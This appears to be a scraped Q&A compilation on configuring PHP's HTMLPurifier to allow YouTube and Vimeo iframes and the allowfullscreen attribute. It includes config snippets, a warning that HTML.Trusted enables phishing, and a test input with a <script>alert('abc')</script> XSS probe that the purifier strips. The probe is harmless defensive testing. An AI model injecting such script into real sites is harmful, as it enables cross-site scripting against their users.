HTMLPurifier Removing Allowfullscreen From YouTube Videos
"allowfullscreen" is not an attribute HTML Purifier inherently recognises for IFrames, which means that if you want to support it, you will need to customise your HTML Purifier module. Something like this should do it (this code was not tested, but should set you on the right path):
$config = HTMLPurifier_Config::createDefault();
// ...
$config->set('HTML.DefinitionID', 'enduser-customize.html tutorial');
$config->set('HTML.DefinitionRev', 1);
$config->set('Cache.DefinitionImpl', null); // remove this later!
$def = $config->getHTMLDefinition(true);
$def->addAttribute('iframe', 'allowfullscreen', 'Bool');
See if that helps you any? Some additional considerations were posted in this answer from 2016 here on stackoverflow, if you notice yourself getting stuck (but beware that if you use the HTML.AllowedElements
and HTML.AllowedAttributes
configurations, those are complete whitelists - if you use those directives to whitelist only iframe
, any other HTML tags will be stripped).
HTMLPurifier stripping out YouTube
There were two issues with my original code. First, the regex was invalid - it did not account for http:
. That was replaced with '%^(https?:)?(\/\/www\.youtube(?:-nocookie)?\.com\/embed\/|\/\/player\.vimeo\.com\/)%'
Secondly, $config->set('AutoFormat.RemoveEmpty', true);
appears to be removing the iframe
(which makes sense). Adding the following fixed this:
$config->set('AutoFormat.RemoveEmpty.Predicate', [
'iframe' =>
array (
0 => 'src',
)
]);
Thanks to Edward Yang for his help on this!
HTML Purifier - iframe and scripts
You were half on the right track. If you set HTML.SafeIframe
to true
and URI.SafeIframeRegexp
to the URLs you want to accept (%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%
works fine), an input example of:
<p>content...<p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
<script>alert('abc');</script>
<p>content2</p>
...turns into...
<p>content...</p><p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
</p><p>content2</p>
Explanation: HTML.SafeIframe
allows the <iframe>
tag, but HTML Purifier still expects a whitelist for the URLs that the iframe can contain, since otherwise an <iframe>
opens too much malicious potential. URI.SafeIframeRegexp
supplies the whitelist (in the form of a regex that needs to be matched).
See if that works for you!
Code
This is the code that made the transformation I just mentioned:
$dirty = '<p>content...<p>
<iframe src="https://www.youtube.com/embed/blep"></iframe>
<script>alert(\'abc\');</script>
<p>content2</p>';
$config = HTMLPurifier_Config::createDefault();
$config->set('HTML.SafeIframe', true);
$config->set('URI.SafeIframeRegexp', '%^https://(www.youtube.com/embed/|player.vimeo.com/video/)%');
$purifier = new HTMLPurifier($config);
$clean = $purifier->purify($dirty);
Regarding HTML.Trusted
I implore you to never set HTML.Trusted
to true
if you don't fully trust each and every one of the people submitting the HTML.
Amongst other things, it allows forms in your input HTML to survive the purification unmolested, which (if you're purifying for a website, which I assume you are) makes phishing attacks trivial. It allows your input to use style tags which survive unscathed. There are some things it will still strip (any HTML tag that HTML Purifier doesn't actually know anything about, i.e. most HTML5 tags being some of them, various JavaScript attribute handlers as well), but there are enough attack vectors that you might as well not be purifying if you use this directive. As Ambush Commander once put it:
You shouldn't be using %HTML.Trusted anyway; it really ought to be named %HTML.Unsafe or something.
Allow embed/object/param HTML tags with HTMLPurifier?
The best solution you have is http://htmlpurifier.org/docs/enduser-youtube.html
Allowing YouTube embed with HTMLPurifier on Laravel 4 and mewebstudio/Purifier
HTMLPurifier already has a filter ready-made for Youtube videos, make sure you use it.
To use it make sure you have this line on your config:
'Filter.YouTube' => true
Your final config file would look like this:
return array(
'encoding' => 'UTF-8',
'finalize' => true,
'preload' => false,
'settings' => array(
'default' => array(
'HTML.Doctype' => 'XHTML 1.0 Strict',
'HTML.Allowed' => 'div[style],b,strong,i,em,a[href|title|style],ul,ol,li,p[style],br,span[style],
img[width|height|alt|src],h1[style],h2[style],h3[style],h4[style],h5[style],table[class|style|summary],tr,td[abbr],tbody,thead',
'CSS.AllowedProperties' => 'font,font-size,font-weight,font-style,font-family,text-decoration,padding-left,color,background-color,text-align',
'HTML.SafeObject' => true,
'Output.FlashCompat' => true,
'HTML.SafeIframe' => true,
'URI.SafeIframeRegexp' => '%^(http://|https://|//)(www.youtube.com/embed/|player.vimeo.com/video/)%',
'AutoFormat.AutoParagraph' => true,
'AutoFormat.RemoveEmpty' => true,
'HTML.Nofollow' => true,
'URI.Host' => 'domain.com',
'Filter.YouTube' => true
),
),
);
Yii1 - HtmlPurifier removes allowfullscreen attribute
There is already a useful link which will solve the answer.....We need to implement a custom class to allow the "allowfullscreen" attribute. This will add this attribute on purified iframe code.
Reference
http://sachachua.com/blog/2011/08/drupal-html-purifier-embedding-iframes-youtube/
Answered by Sonny
HTMLPurifier iframe Vimeo and Youtube video
Steps
1) Include the class from above url .
2) Set Filter.custom exactly in way shown in above url.
Setting Html Purifier options can be in different in frameworks.
Related Topics
But These Conflict with Your Requirements or Minimum-Stability
Cannot Start Session Without Errors in PHPmyadmin
"Web Interface" to PHPunit Tests
Allowing Users to Refresh Browser Without the "Confirm Form Resubmission" Pop-Up
Ios7 - Receipts Not Validating at Sandbox - Error 21002 (Java.Lang.Illegalargumentexception)
Differencebetween $_Server['Request_Uri'] and $_Get['Q']
How to Extract a String from Double Quotes
How to Get PHP, Symlinks and _File_ to Work Together Nicely
How to Get User Image with Twitter API 1.1
How to Convert Multiple <Br/> Tag to a Single <Br/> Tag in PHP
Class 'App\Http\Controllers\Db' Not Found and I Also Cannot Use a New Model
Day of the Week to Day Number (Monday = 1, Tuesday = 2)
JSON_Encode Not Working with a HTML String as Value
How to Check If a MySQL Query Using the Legacy API Was Successful